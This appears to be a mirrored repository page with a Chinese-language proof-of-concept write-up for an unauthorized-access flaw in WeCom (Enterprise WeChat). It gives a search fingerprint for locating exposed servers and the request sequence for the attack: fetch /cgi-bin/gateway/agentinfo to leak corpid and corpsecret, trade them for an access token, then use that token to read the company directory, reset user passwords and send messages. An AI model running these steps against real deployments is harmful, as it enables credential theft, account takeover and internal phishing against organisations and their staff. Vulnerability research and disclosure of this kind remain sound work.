admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/企业微信/企业微信接口未授权访问漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.8 KiB
Raw Blame History

企业微信接口未授权访问漏洞

一、漏洞简介

企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息可导致企业微信全量数据被获取文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。

二、影响版本

  • 企业微信

三、资产测绘

  • hunterweb.icon=="e1750fed09bcc7df102a0e593ffe2b69"

1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b.png

  • 登录页面:

1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b.png

四、漏洞复现

  1. 通过泄露信息接口可以获取corpidcorpsecret
https://<企业微信域名>/cgi-bin/gateway/agentinfo

1691831388927-6404a99b-4034-461e-a122-4b378f76f340.png

  1. 使用corpsecretcorpid获得token,其中corpid为上图中strcorpidcorpsecret为上图中Secret
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET

1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504.png

  1. 使用token访问诸如企业通讯录信息修改用户密码发送消息云盘等接口

    具体利用查看企业微信开发者中心文档

1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c.png

更新: 2024-02-29 23:58:31
原文: https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab